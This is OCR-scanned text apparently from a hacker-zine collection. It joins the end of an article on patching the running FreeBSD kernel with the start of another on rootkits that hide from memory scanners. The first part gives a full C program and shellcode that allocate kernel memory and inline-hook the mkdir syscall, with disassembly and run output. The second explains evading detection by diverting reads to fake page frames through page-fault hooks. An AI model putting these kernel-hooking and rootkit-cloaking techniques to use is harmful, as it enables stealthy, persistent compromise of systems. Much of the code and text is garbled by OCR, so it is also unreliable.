"\x20" /* sp *x/ 
"\ x53" fFoS ia, 
"\x59" {# Xx * / 
"\ x53" fk S ay 
WN 54.3 /* (Se * / 
"\x41" /* A xf 
"\x4o" /* L iy 
"\x4oN /* Lh */ 
"\x20" /* sp wes 
"\x3a" /* 3: */ 
"\x20" /* sp es 
WN QS fe % ay. 
W\ se." LS ay, 
"\x0a" /* nl * / 
"\ x00" /* null * / 
"\ x55" /* push sebp * / 
"\x89\xe5" /* mov sesp, sebp */ 
"\x83\xec\x08" /* sub S0x8,%esp * / 
"\x8b\x45\x0c" /* mov Oxc (%ebp) , eax * / 
"\x8b\x00" /* mov (Seax) , eax x / 
"\xc7\x04\x24\x0d\x00\x00\x00" /* movl SOxd, (%esp) * / 
"\x89\x44\x24\x04" /* mov eax, 0x4 (Sesp) * / 
"\xe8\xfc\xff\xff\xffi" /* call 17 <hacked_mkdirt+0x17>*/ 
"\x31\xc0" /* xor Seax, eax */ 
"\x83\xc4\x08" /* add S0x8,%esp * / 
"\x5d"; /* pop Sebp */ 
/* 
* Jump code 
*/ 


unsigned char jp_code[] = 
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"\xb8\x00\x00\x00\x00" /* movil $0, %eax 
"\xff\xed"; /*  Jmp *Seax 
/* 
* struct used to store kernel address 
Ky 


struct kma_struct { 


unsigned long size; 
unsigned long *addr; 


}; 


int main(int argc, char **argv) { 


int i = 0; 

char errbuf [_POSIX2_LINE_MAX]; 
kvm_t *kd; 

u_int32_t km_offset_l; 
u_int32_t km_offset_2; 
u_int32_t ha_offset_l; 

struct nlist nl[] = 


5 


unsigned long diff; 

int position; 

unsigned char orig_code[sizeof (km_code) ]; 
struct kma_struct kma; 


/* Initialize kernel virtual memory access */ 


kd = kvm_openfiles (NULL, NULL, NULL, O_RDWR, errbuf); 

if(kd == NULL) { 
fprintf(stderr, "ERROR: %s\n", errbuf); 
exit (-1); 


} 


/* Find the address of mkdir, M_TEMP, malloc, copyout, 
uprintf, and kern_rmdir */ 


nl[0O].n_name = "mkdir"; 
nl{1l].n_name = "M_TEMP"; 
nl[{2].n_name = "malloc"; 
nl[3].n_name = "copyout"; 
nl[4].n_name = "uprintf"; 
nl[5].n_name = "kern_rmdir"; 
if (kvm_nlist (kd, nl) < 0) { 


fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit(-1); 


for(i = 0; i <= 5; itt) { 
if(!nl[i].n_value) { 
fprintf(stderr, 
, nl[i].n_name); 
exit (-1); 


/* Determine size of mkdir syscall */ 


{ { NULL },{ NULL },{ NULL },{ NULL },{ NULL },{ NULL},{ NULL }, 


"ERROR: Symbol %s not found\n" 


tf 
a 


}; 


7.txt Wed Apr 26 09:43:45 2017 21 


diff = nl[5].n_value - nl[0].n_value; 
unsigned char mk_code[diff]; 


/* Save a copy of mkdir syscall */ 
if (kvm_read(kd, nl[0].n_value, mk_code, diff) < 0) { 


fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit(-1); 


} 
/* Determine position of Oxe8 */ 
for(i = 0; i < (int)diff; itt) { 


if (mk_code[i] == Oxe8) { 
position = i; 


} 


/* Calculate the correct offsets for kmalloc */ 


km_offset_1l nl[{0].n_value + KM_OFFSE 
km_offset_2 = nl1[0].n_value + KM_OFFSET_2; 


/* Set the km_code to contain the correct addresses */ 


*(unsigned long *) &km_code[44] = nl[1].n_value; 

*(unsigned long *) &km_code[54] = nl[2].n_value - km_offset_1; 
*(unsigned long *)&km_code[82] = nl[3].n_value - km_offset_2; 

/* Save mkdir syscall */ 

if (kvm_read(kd, nl[0].n_value, orig_code, sizeof (km_code)) < 0) { 


fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit(-1); 
} 


/* Replace mkdir with kmalloc */ 
if (kvm_write (kd, nl[0].n_value, km_code, sizeof(km_code)) < 0) { 


fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit(-1); 


} 
/* Allocate kernel memory */ 
kma.size = (unsigned long) sizeof (ha_code) + (unsigned long) position 


+ (unsigned long) sizeof (jp_code) ; 
syscall(136, &kma); 


/* Restore mkdir */ 


if (kvm_write(kd, nl[0].n_value, orig_code, sizeof (km_code)) < 0) { 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit (-1); 


/* Calculate the correct offsets for hacked_mkdir */ 


ha_offset_1l = (unsigned long)kma.addr + HA_OFFSET_1; 
/* Set the ha_code to contain the correct addresses */ 


*(unsigned long *) &ha_code[34] = (unsigned long) kma.addr; 
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*(unsigned long *) &ha_code[43] = nl[4].n_value - ha_offset_1; 


/* Place hacked_mkdir routine into kernel memory */ 


if (kvm_write(kd, (unsigned long)kma.addr, ha_code, sizeof (ha_code) ) 
< 0) { 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit(-1); 


} 


/* Place mk_code into kernel memory */ 


if (kvm_write(kd, (unsigned long)kma.addr + 
(unsigned long) sizeof (ha_code) - 1, mk_code, position) < 0) { 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit (-1); 


} 
/* Set the jp_code to contain the correct address */ 


*(unsigned long *)&jp_code[1] = nl[0].n_value + 
(unsigned long) position; 


/* Place jump code into kernel memory */ 
if (kvm_write(kd, (unsigned long)kma.addr + 

(unsigned long) sizeof (ha_code) - 1 + 
(unsigned long) position 

, jp_code, sizeof(jp_code)) < 0) { 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit (-1); 


/* Set the jp_code to contain the correct address */ 
*(unsigned long *)&jp_code[1] = (unsigned long)kma.addr + 0x14; 
if (kvm_write(kd, nl[0].n_value, jp_code, sizeof(jp_code)) < 0) { 


fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit(-1); 


} 


printf("I love the PowerGlove. It’s so bad!\n") 


/* Close kd */ 


if (kvm_close(kd) < 0) {f{ 
fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd)); 
exit(-1); 


} 


exit (0); 
} 


The comments state that the algorithm for this program is as follows: 


Copy mkdir syscall upto but not including \xe8. 
Allocate kernel memory. 
Place new routine in newly allocated address space. 
Overwrite first 7 bytes of mkdir syscall with an instruction to jump 
to new routine. 
5. Execute new routine, plus the first x bytes of mkdir syscall. 
Where x is equal to the number of bytes copied from step 1. 
6. Jump back to mkdir syscall + offset. 


mw wN PF 
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Where offset is equal to the location of \xe8. 


The reason behind copying mkdir upto but not including \xe8 is because 
on different builds of FreeBSD the disassembly of the mkdir syscall is 
different. Therefore one cannot determine a static location to jump back 
to. However, on all builds of FreeBSD mkdir makes a call to kern_mkdir, 
thus we choose to jump back to that point. The following illustrates this. 


[ ] 


ghost@slavezero: #nm /boot/kernel/kernel | grep mkdir 
c047c560 T devfs_vmkdir 

c0620e40 t handle_written_mkdir 

c0556ca0 T kern_mkdir 


c0557030 T mkdir 

c0O71d57c B mkdirlisthd 

c048a3e0 t msdosfs_mkdir 
c05e2ed0 t nfs4_mkdir 

c05d8710 t nfs_mkdir 

c05f9140 T nfsrv_mkdir 

c06b4856 r nfsv3err_mkdir 
c063a670 t ufs_mkdir 

c0702£40 D vop_mkdir_desc 
c0702£64 d vop_mkdir_vp_offsets 


ghost@slavezero: #nm /boot/kernel/kernel | grep kern_rmdir 

c0557060 T kern_rmdir 

ghost@slavezero: ~#objdump -d start-—address=0xc0557030 
stop-address=0xc0557060 /boot/kernel/kernel | less 


/boot/kernel/kernel: file format elf32-1386-freebsd 
Disassembly of section .text: 


c0557030 <mkdir>: 


c0557030: 59 push Sebp 

e055:2031: 81 e9 xor SECX, SECX 
c0557033: 89 e5 mov Sesp, sebp 
c0557035: 83 ec 10 sub $0x10,%esp 
c0557038: 8b 55 Oc mov Oxc (Sebp) , sedx 
c055703b: 8b 42 04 mov 0x4 (Sedx) , Seax 
c055703e: 89 4c 24 08 mov Secx, 0x8 (Sesp) 
c0557042: 89 44 24 0c mov seax, Oxc (SeSp) 
c0557046: 8b 02 mov (Sedx) , seax 
c0557048: 89 44 24 04 mov seax, 0x4 (Sesp) 
c055704c: 8b 45 08 mov 0x8 (Sebp) , seax 
cO55704£: 89 04 24 mov Seax, (esp) 
c0557052: e8 49 fc ff ff call c0556ca0 <kern_mkdir> 
c0557057: c9 leave 

c0557058: cs ret 

c0557059: 8d b4 26 00 00 00 O00 lea 0x0 (esi), %esi 


ghost@slavezero: “# 


[ ] 


[ ] 


ghost@slavetwo:”~#nm /boot/kernel/kernel | grep mkdir 

c046f680 T devfs_vmkdir 

c0608fd0 t handle_written_mkdir 

c05415d0 T kern_mkdir 

c0541900 T mkdir 

c074a9bec B mkdirlisthd 

c047d270 t msdosfs_mkdir 

c05c7160 t nfs4_mkdir 
t 
T 


cO5bcfd0 nfs_mkdir 
c05db750 nfsrv_mkdir 


7.txt Wed Apr 26 09:43:45 2017 24 


c06a2676 r nfsv3err_mkdir 

c06216a0 t ufs_mkdir 

c06fef40 D vop_mkdir_desc 

c06fef64 d vop_mkdir_vp_offsets 

ghost@slavetwo:”~#nm /boot/kernel/kernel | grep kern_rmdir 

c0541930 T kern_rmdir 

ghost@slavetwo:” #objdump -dR start-address=0xc0541900 
stop-address=0xc0541930 /boot/kernel/kernel | less 


/boot/kernel/kernel: file format elf32-i386-freebsd 


Disassembly of section .text: 


c0541900 <mkdir>: 

c0541900: 5:9 push Sebp 

c0541901: 89 e5 mov Sesp, sebp 
c0541903: 83 ec 10 sub $0x10,%esp 
c0541906: 8b 55 Oc mov Oxc (Sebp) , sedx 
c0541909: 8b 42 04 mov 0x4 (Sedx) , Seax 
c054190c: c7 44 24 08 00 00 O00 movil $0x0,0x8 (%esp) 
c0541913: 00 

c0541914: 89 44 24 0c mov Seax, 0Oxc (Sesp) 
c0541918: 8b 02 mov (Sedx) , eax 
c054191la: 89 44 24 04 mov Seax, 0x4 (Sesp) 
c05419l1e: 8b 45 08 mov 0x8 (Sebp) , seax 
c0541921: 89 04 24 mov Seax, (SeESp) 
c0541924: e8 a/v fe ff ff call c05415d0 <kern_mkdir> 
c0541929: c9 leave 

c054192a: G3 ret 

c054192b: 90 nop 

c054192c: 8d 74 26 00 lea 0x0 (Sesi),%esi 


ghost@slavetwo: ~# 


[ ] 


The above output was generated from two different FreeBSD 5.4 builds. 
As one can clearly see the dissassembly dump of mkdir is different for each 
one. 


In test_hook the address of kern_rmdir is sought after, this is because 
in memory kern_rmdir comes right after mkdir, thus its address is the end 


boundary for mkdir. 


The bytecode for the call hook is as follows: 


unsigned char ha_code[] = 


"\x4qn /* M ed 
"\x4b" /* K sf 
"\x4qn /* D wh 
"\x4g9" /* of */ 
"\x52" /* R */ 
"\x20" peep ee 
"\x53" LE OS ey; 
"\x59" JEON. gd 
"\ x53" [= OS Si 
"\x43" /* CG * / 
"\x41" /* A * / 
"\x4de" /* L ay. 
"\xde" /* L 7 
"\x20" /* sp ee 
"\x3q" /* 3: */ 
"\x20" /* sp He 
"\x25" /* & * / 
WA 5247.38 /* Ss * / 
"\x0a" Vecenolll * / 
"\ x00" /* null */ 


W\ x55" /* push sebp x] 


7.txt Wed Apr 26 09:43:45 2017 25 


"\x89\xe5" /* mov sesp, sebp A 
"\x83\xec\x08" /* sub S0x8,%esp * / 
"\x8b\x45\x0c" /* mov Oxc (%ebp) , seax * / 
"\x8b\x00" /* mov (eax), eax * / 
"\xc7\x04\x24\x0d\x00\x00\x00" /* movl SOxd, (esp) * / 
"\x89\x44\x24\x04" /* mov eax, 0x4 (%esp) */ 
"\xe8\xfc\xff\xff\xffi" /* call 17 <hacked_mkdir+0x17>*/ 
"\x31\xcO" /* xor Seax, eax * / 
"\x83\xc4\x08" /* add S0x8,%esp * / 
"\x5da"; /* pop sebp Sy/ 


The first 20 bytes is for the string to be printed, because of this 
when we jump to this function we have to start at an offset of 0x14, as 
illustrated from this line of code: 


*(unsigned long *)&jp_code[1] = (unsigned long)kma.addr + 0x14; 


The last three statements in the hacked_mkdir bytecode zeros out the 
ax register, cleans up the stack, and restores th bp register. This is 
done so that when mkdir actually executes its as if nothing has already 
occurred. 


One thing to remember about character arrays in C is that they are all 
null terminated. For example if we declare the following variable, 


unsigned char example[] = "\x41"; 
sizeof(example) will return 2. This is the reason why in test_hook we 
subtract 1 from sizeof (ha_code), otherwise we would be writing to the 


wrong spot. 


The following is the output before and after running test_hook: 


[ ] 


ghost@slavetwo: “#ls 

test_hook.c 

ghost@slavetwo:”#gcc -o test_hook test_hook.c -lkvm 
ghost@slavetwo:” #mkdir before 

ghost@slavetwo:”#l1s —-F 

before/ test_hook* test_hook.c 
ghost@slavetwo:” #sudo ./test_hook 

Password: 

I love the PowerGlove. It’s so bad! 
ghost@slavetwo:” #mkdir after 

MKDIR SYSCALL : after 

ghost@slavetwo:”#1s —-F 

after/ before/ test_hook* test_hook.c 
g 


host@slavetwo:~ 


[ ] 


One could also use find_syscall and ddb to verify the results of test_hook 


--[ 6.0 - Concluding Remarks 


Being able to patch and allocate kernel memory gives one a lot of power 
over a system. All the examples in this article are trivial as it was my 
intention to show the how not the what. Other authors have better ideas 
than me anyways on what to do (see References). 


I would like to take this space to apologize if any of my explanations 
are unclear, hopefully reading over the source code and looking at the 
output makes up for it. 


Finally, I would like to thank Silvio Cesare, pragmatic, and Stephanie 
Wehner, for the inspiration/ideas. 
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--[ 0 - Introduction & Background 


Rootkits have historically demonstrated a co-evolutionary adaptation and 
response to the development of defensive technologies designed to 
apprehend their subversive agenda. If we trace th volution of rootkit 
technology, this pattern is evident. First generation rootkits were 
primitive. They simply replaced / modified key system files on the 
victim’s system. The UNIX login program was a common target and involved 
an attacker replacing the original binary with a maliciously enhanced 
version that logged user passwords. Because thes arly rootkit 
modifications were limited to system files on disk, they motivated the 
development of file system integrity checkers such as Tripwire [1]. 


In response, rootkit developers moved their modifications off disk to the 
memory images of the loaded programs and, again, evaded detection. These 
'second’ generation rootkits were primarily based upon hooking techniques 
that altered the execution path by making memory patches to loaded 
applications and some operating system components such as the system call 
table. Although much stealthier, such modifications remained detectable by 
searching for heuristic abnormalities. For example, it is suspicious for 
the system service table to contain pointers that do not point to the 
operating system kernel. This is the technique used by VICE [2]. 


Third generation kernel rootkit techniques like Direct Kernel Object 
Manipulation (DKOM), which was implemented in the FU rootkit [3], 
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capitalize on the weaknesses of current detection software by modifying 
dynamically changing kernel data structures for which it is impossible to 
establish a static trusted baseline. 


----[ 0.1 - Motivations 


There are public rootkits which illustrate all of these various techniques, 
but even the most sophisticated Windows kernel rootkits, like FU, possess 
an inherent flaw. They subvert essentially all of the operating system’s 


subsystems with one exception: memory management. Kernel rootkits can 
control the execution path of kernel code, alter kernel data, and fake 
system call return values, but they have not (yet) demonstrated the 
capability to ’hook’ or fake the contents of memory seen by other running 
applications. In other words, public kernel rootkits are sitting ducks for 
in memory signature scans. Only now are security companies beginning to 
think of implementing memory signature scans. 


Hiding from memory scans is similar to the problem faced by early viruses 
attempting to hide on the file system. Virus writers reacted to anti-virus 
programs scanning the file system by developing polymorphic and metamorphic 
techniques to evade detection. Polymorphism attempts to alter the binary 
image of a virus by replacing blocks of code with functionally equivalent 
blocks that appear different (i.e. use different opcodes to perform the 
same task). Polymorphic code, therefore, alters the superficial appearance 
of a block of code, but it does not fundamentally alter a scanner’s view of 
that region of system memory. 


Traditionally, there have been thr general approaches to malicious code 
detection: misuse detection, which relies upon known code signatures, 
anomaly detection, which relies upon heuristics and statistical deviations 
from ’normal’ behavior, and integrity checking which relies upon comparing 
current snapshots of the file system or memory with a known, trusted 
baseline. A polymorphic rootkit (or virus) effectively evades signature 
based detection of its code body, but falls short in anomaly or integrity 
detection schemes because it cannot easily camouflage the changes it makes 
to existing binary code in other system components. 


Now imagine a rootkit that makes no effort to change its superficial 
appearance, yet is capable of fundamentally altering a detectors view of an 
arbitrary region of memory. When the detector attempts to read any region 
of memory modified by the rootkit, it sees a ’normal’, unaltered view of 
memory. Only the rootkit sees the true, altered view of memory. Such a 
rootkit is clearly capable of compromising all of the primary detection 
methodologies to varying degrees. The implications to misuse detection are 
obvious. A scanner attempts to read the memory for the loaded rootkit 
driver looking for a code signature and the rootkit simply returns a 
random, ’fake’ view of memory (i.e. which does not include its own code) to 
the scanner. There are also implications for integrity validation 
approaches to detection. In these cases, the rootkit returns the unaltered 
view of memory to all processes other than itself. The integrity checker 
sees the unaltered code, finds a matching CRC or hash, and (erroneously) 
assumes that all is well. Finally, any anomaly detection methods which 
rely upon identifying deviant structural characteristics will be fooled 
since they will receive a ‘normal’ view of the code. An example of this 
might be a scanner like VICE which attempts to heuristically identify 
inline function hooks by the presence of a direct jump at the beginning of 
the function body. 


Current rootkits, with the exception of Hacker Defender [4], have made 
little or no effort to introduce viral polymorphism techniques. As stated 
previously, while a valuable technique, polymorphism is not a comprehensive 
solution to the problem for a rootkit because the rootkit cannot easily 
camouflage the changes it must make to existing code in order to install 
its hooks. Our objective, therefore, is to show proof of concept that the 
current architecture permits subversion of memory management such that a 
non polymorphic kernel mode rootkit (or virus) is capable of controlling 
the view of memory regions seen by the operating system and other processes 
with a minimal performance hit. The end result is that it is possible to 
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hide a ‘known’ public rootkit driver (for which a code signature exists) 
from detection. To this end, we have designed an ’enhanced’ version of the 
FU rootkit. In section 1, we discuss the basic techniques used to detect a 
rootkit. In section 2, we give a background summary of the x86 memory 
architecture. Section 3 outlines the concept of memory cloaking and proof 
of concept implementation for our enhanced rootkit. Finally, we 

conclude with a discussion of its detectability, limitations, future 
extensibility, and performance impact. Without further ado, we bid you 
welcome to 4th generation rootkit technology. 


--[ 1 - Rootkit Detection 


Until several months ago, rootkit detection was largely ignored by security 
vendors. Many mistakenly classified rootkits in the same category as other 
viruses and malware. Because of this, security companies continued to use 
the same detection methods the most prominent one being signature scans on 
the file system. This is only partially effective. Once a rootkit is loaded 
in memory is can delete itself on disk, hide its files, or even divert an 
attempt to open the rootkit file. In this section, we will examine more 
recent advances in rootkit detection. 


----[ 1.2 - Detecting The Effect Of A Rootkit (Heuristics) 


One method to detect the presence of a rootkit is to detect how it alters 
other parameters on the computer system. In this way, the effects of the 
rootkit are seen although the actual rootkit that caused the deviation may 
not be known. This solution is a more general approach since no signature 
for a particular rootkit is necessary. This technique is also looking for 
the rootkit in memory and not on the file system. 


One effect of a rootkit is that it usually alters the execution path of a 
normal program. By inserting itself in the middle of a program’s execution, 
the rootkit can act as a middle man between the kernel functions the 
program relies upon and the program. With this position of power, the 
rootkit can alter what the program sees and does. For example, the rootkit 
could return a handle to a log file that is different from the one the 
program intended to open, or the rootkit could change the destination of 
network communication. These rootkit patches or hooks cause extra 
instructions to b xecuted. When a patched function is compared to a 

ormal function, the difference in the number of instructions executed can 
e indicative of a rootkit. This is the technique used by PatchFinder [5]. 
ne of the drawbacks of PatchFinder is that the CPU must be put into single 
tep mode in order to count instructions. So for every instruction executed 
n interrupt is fired and must be handled. This slows the performance of 

he system, which may be unacceptable on a production machine. Also, the 
ctual number of instructions executed can vary even on a clean system. 


_ 


nother rootkit detection tool called VICE detects the presence of hooks in 
applications and in the kernel . VICE analyzes the addresses of the 
functions exported by the operating system looking for hooks. The exported 
functions are typically the target of rootkits because by filtering certain 
APIs rootkits can hide. By finding the hooks themselves, VICE avoids the 
problems associated with instruction counting. However, VICE also relies 
upon several APIs so it is possible for a rootkit to defeat its hook 
detection [6]. Currently the biggest weakness of VICE is that it detects 
all hooks both malicious and benign. Hooking is a legitimate technique used 


by many security products. 


 potoaNnOOS 


Another approach to detecting the effects of a rootkit is to identify the 
operating system lying. The operating system exposes a well-known API in 
order for applications to interact with it. When the rootkit alters the 
results of a particular API, it is a lie. For example, Windows Explorer may 
request the number of files in a directory using several functions in the 
Win32 API. If the rootkit changes the number of files that the application 
can see, it is a lie. To detect the lie, a rootkit detector needs at least 
two ways to obtain the same information. Then, both results can be 
compared. RootkitRevealer [7] uses this technique. It calls the highest 
level APIs and compares those results with the results of the lowest level 
APIs. This method can be bypassed by a rootkit if it also hooks at those 
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lowest layers. RootkitRevealer also does not address data alterations. The 
FU rootkit alters the kernel data structures in order to hide its 
processes. RootkitRevealer does not detect this because both the higher and 
lower layer APIs return the same altered data set. Blacklight from F-Secure 
8] also tries to detect deviations from the truth. To detect hidden 
processes, it relies on an undocumented kernel structure. Just as FU walks 
the linked list of processes to hide, Blacklight walks a linked list of 
handle tables in the kernel. Every process has a handle table; therefore, 
by identifying all the handle tables Blacklight can find a pointer to every 
process on the computer. FU has been updated to also unhook the hidden 
process from the linked list of handle tables. This arms race will 
continue. 


----[ 1.2 - Detecting the Rootkit Itself (Signatures) 


Anti-virus companies have shown that scanning file systems for signatures 
can b ffective; however, it can be subverted. If the attacker camouflages 
the binary by using a packing routine, the signature may no longer match 
the rootkit. A signature of the rootkit as it will execute in memory is one 
way to solve this problem. Some host based intrusion prevention systems 
(HIPS) try to prevent the rootkit from loading. However, it is extremely 
difficult to block all the ways code can be loaded in the kernel . Recent 
papers by Jack Barnaby [9] and Chong [10] have highlighted the threat of 
kernel exploits, which will allow arbitrary code to be loaded into memory 
and executed. 


Although file system scans and loading detection are needed, perhaps the 
last layer of detection is scanning memory itself. This provides an added 
layer of security if the rootkit has bypassed the previous checks. Memory 
signatures are more reliable because the rootkit must unpack or unencrypt 
in order to execute. Not only can scanning memory be used to finda 
rootkit, it can be used to verify the integrity of the kernel itself since 
it has a known signature. Scanning kernel memory is also much faster than 
scanning everything on disk. Arbaugh et. al. [11] have taken this technique 
to the next level by implementing the scanner on a separate card with its 
own CPU. 


The next section will explain the memory architecture on Intel x86. 


--[ 2 - Memory Architecture Review 


In early computing history, programmers were constrained by the amount of 
physical memory contained in a system. If a program was too large to fit 
into memory, it was the programmer’s responsibility to divide the program 
into pieces that could be loaded and unloaded on demand. These pieces wer 
called overlays. Forcing this type of memory management upon user level 
programmers increased code complexity and programming errors while reducing 
efficiency. Virtual memory was invented to relieve programmers of these 
burdens. 


----[ 2.1 - Virtual Memory - Paging vs. Segmentation 


Virtual memory is based upon the separation of the virtual and physical 
address spaces. The size of the virtual address space is primarily a 
function of the width of the address bus whereas the size of the physical 
address space is dependent upon the quantity of RAM installed in the 
system. Thus, a system possessing a 32 bit bus is capable of addressing 
2°32 (or ~4 GB) physical bytes of contiguous memory. It may, however, not 
have anywhere near that quantity of RAM installed. If this is the case, 
then the virtual address space will be larger than the physical address 
space. Virtual memory divides both the virtual and physical address spaces 
into fixed size blocks. If these blocks are all the same size, the system 
is said to use a paging memory model. If the blocks are varying sizes, it 
is considered to be a segmentation model. The x86 architecture is in fact a 
hybrid, utlizing both segementation and paging, however, this article 
focuses primarily upon exploitation of its paging mechanism. 


Under a paging model, blocks of virtual memory are referred to as pages and 
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(1 per process) (512 per processs) 


[ Figure 4 - x86 Address Translation ] 


A memory access under a 2 level paging scheme potentially involves the 
following sequence of steps. 


1. 


Lookup of page directory entry (PDE). 
Page Directory Entry = Page Directory Base Address + sizeof(PDE) * Page 
Directory Index (extracted from virtual address that caused the memory 
access) 
NOTE: Windows maps the page directory to virtual address 0xC0300000. 
Base addresses for page directories are also located in KPROCESS blocks 
and the register cr3 contains the physical address of the current 
page directory. 
Lookup of page table entry. 
Page Table Entry = Page Table Base Address + sizeof(PTE) * Page Table 
Index (extracted from virtual address that caused the memory access). 
NOTE: Windows maps the page directory to virtual address 0xC0Q000000. 
The base physical address for the page table is also stored in the page 
directory entry. 
Lookup of physical address. 
Physical Address = Contents of PTE + Byte Index 
NOTE: PTES hold the physical address for the physical frame. This is 
combined with the byte index (offset into the frame) to form the 
complete physical address. For those who prefer code to explanation, the 
following two routines show how this translation occurs. The first 
routine, GetPteAddress performs steps 1 and 2 described above. It 
returns a pointer to the page tabl ntry for a given virtual address. 
The second routine returns the base physical address of the frame to 
which the page is mapped. 

define PROCESS_PAGE_DIR_BASE 0xC0300000 

define PROCESS_PAGE_TABLE_ BASE 0xC0000000 

typedef unsigned long* PPTE; 


[BORK RR KKK KK KR I I I A OR KK OK OK KK 


* GetPteAddress Returns a pointer to the page tabl ntry corresponding 


* 


+ + + + + + + FF FF F F F F 


to a given memory address. 


Parameters: 


PVOID VirtualAddress - Address you wish to acquire a pointer to the 
page table entry for. 


Return — Pointer to the page tabl ntry for VirtualAddress or an error 
code. 


Error Codes: 


ERROR_PTE_NOT_PRESEN The page table for the given virtual 
address is not present in memory. 

ERROR_PAGE_NOT_PRESENT - The page containing the data for the 
given virtual address is not present in 
memory. 


FAK KK I I I I I I I I A RI RK KK / 
PPTE GetPteAddress( PVOID VirtualAddress ) 


{ 


PPTE pPTE = 0; 
__asm 


eli //disable interrupts 
pushad 

mov esi, PROCESS_PAGE_DIR_BASE 
mov edx, VirtualAddress 
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mov eax, edx 
shr eax, 22 


lea eax, [esi + eax*4] //pointer to page directory entry 
test [eax], 0x80 //is it a large page? 
jnz Is_Large_Page //it’s a large page 


mov esi, PROCESS_PAGE_TABLE_BASE 
shr edx, 12 


lea eax, [esi + edx*4] //pointer to page table entry (PTE) 
mov pPTE, eax 
jmp Done 


//NOTE: There is not a page table for large pages becaus 
//the phys frames are contained in the page directory. 
Is_Large_Page: 

mov pPTE, eax 


Done: 

popad 

sti //ceenable interrupts 
}//end asm 


return pPTE; 


}//end GetPteAddress 


[BOK KKK KKK KK KR I I I I I I OR KK KK 

GetPhysicalFrameAddress Gets the base physical address in memory where 
the page is mapped. This corresponds to the 
bits 12 - 32 in the page tabl ntry. 


* 

* 

* 

* 

* Parameters — 
< PPTE pPte —- Pointer to the PTE that you wish to retrieve the 
- physical address from. 

* 


* Return — The physical address of the page. 
FAK A KI I I I I I I I A I I OK I / 


ULONG GetPhysicalFrameAddress( PPTE pPte ) 
{ 


ULONG Frame = 0; 
__asm 


cli 
pushad 
mov eax, pPte 
mov ecx, [eax] 
shr ecx, 12 //physical page frame consists of the 
//upper 20 bits 
mov Frame, ecx 
popad 
sti 
}//end asm 
return Frame; 


}//end GetPhysicalFrameAddress 


—----[ 2.5 - The Role Of The Page Fault Handler 


Since many processes only use a small portion of their virtual address 
space, only the used portions are mapped to physical frames. Also, because 
physical memory may be smaller than the virtual address space, the OS may 
move less recently used pages to disk (the pagefile) to satisfy current 
memory demands. Frame allocation is handled by the operating system. If a 
process is larger than the available quantity of physical memory, or the 
operating system runs out of free physical frames, some of the currently 
allocated frames must be swapped to disk to make room. These swapped out 
pages are stored in the page file. The information about whether or not a 
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page is resident in main memory is stored in the page tabl ntry. When a 
memory access occurs, if the page is not present in main memory a page 
fault is generated. It is the job of the page fault handler to issue the 
I/O requests to swap out a less recently used page if all of the available 
physical frames are full and then to bring in the requested page from the 
pagefile. When virtual memory is enabled, every memory access must be 
looked up in the page table to determine which physical frame it maps to 
and whether or not it is present in main memory. This incurs a substantial 
performance overhead, especially when the architecture is based upon a 
multi-level page table scheme like the Intel Pentium. The memory access 
page fault path can be summarized as follows. 


1. Lookup in the page directory to determine if the page table for the 
address is present in main memory. 
2. If not, an I/O request is issued to bring in the page table from disk. 
3. Lookup in the page table to determine if the requested page is present 
in main memory. 

4. If not, an I/O request is issued to bring in the page from disk. 

5. Lookup the requested byt (offset) in the page. 


Therefor very memory access, in the best case, actually requires 3 memory 
accesses : 1 to access the page directory, 1 to access the page table, and 
1 to get the data at the correct offset. In the worst case, it may require 
an additional 2 disk I/Os (if the pages are swapped out to disk). Thus, 
virtual memory incurs a steep performance hit. 


----[ 2.6 - The Paging Performance Problem & The TLB 


The translation lookaside buffer (TLB) was introduced to help mitigate this 
problem. Basically, the TLB is a hardware cache which holds frequently used 
virtual to physical mappings. Because the TLB is implemented using 
extremely fast associative memory, it can be searched for a translation 
much faster than it would take to look that translation up in the page 
tables. On a memory access, the TLB is first searched for a valid 
translation. If the translation is found, it is termed a TLB hit. 
Otherwise, it is a miss. A TLB hit, therefore, bypasses the slower pag 
table lookup. Modern TLB’s have an extremely high hit rate and 

therefore seldom incur miss penalty of looking up the translation in the 
page table. 


--[ 3 - Memory Cloaking Concept 


One goal of an advanced rootkit is to hide its changes to executable code 
(i.e. the placement of an inline patch, for example). Obviously, it may 
also wish to hide its own code from view. Code, like data, sits in memory 
and we may define the basic forms of memory access as: 


— EXECUTE 
READ 
— WRIT! 


GJ 


Technically speaking, we know that each virtual page maps to a physical 

page frame defined by a certain number of bits in the page tabl ntry. 
What if we could filter memory accesses such that EXECUTE accesses mapped 
to a different physical frame than READ / WRITE accesses? From a rootkit’s 
perspective, this would be highly advantageous. Consider the case of an 
inline hook. The modified code would run normally, but any attempts to read 
(i.e. detect) changes to the code would be diverted to a /’/virgin’ physical 
frame that contained a view of the original, unaltered code. Similarly, a 
rootkit driver might hide itself by diverting READ accesses within its 
memory range off to a page containing random garbage or to a page 
containing a view of code from another ’innocent’ driver. This would imply 
that it is possible to spoof both signature scanners and integrity 
monitors. Indeed, an architectural feature of the Pentium architecture 
makes it possible for a rootkit to perform this little trick with a minimal 
impact on overall system performance. We describe the details in the next 
section. 
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----[ 3.1 - Hiding Executable Code 


Ironically, the general methodology we are about to discuss is an 
offensive extension of an existing stack overflow protection scheme known 
as PaX. We briefly discuss the PaX implementation in 3.3 under related 
work. 


In order to hide executable code, there are at least 3 underlying issues 
which must be addressed: 


1. We need a way to filter execute and read / write accesses. 

2. We need a way to "fake" the read / write memory accesses 
when we detect them. 

3. We need to ensure that performance is not adversly affected. 


The first issue concerns how to filter execute accesses from read / write 
accesses. When virtual memory is enabled, memory access restrictions are 
enforced by setting bits in the page tabl ntry which specify whether a 
given page is read-only or read-write. Under the IA-32 architecture, 
however, all pages are executable. As such, there is no official way to 
filter execute accesses from read / write accesses and thus enforce the 
execute-only / diverted read-write semantics necessary for this scheme 

to work. We can, however, trap and filter memory accesses by marking their 
PTE’s non present and hooking the page fault handler. In the page fault 
handler we have access to the saved instruction pointer and the faulting 
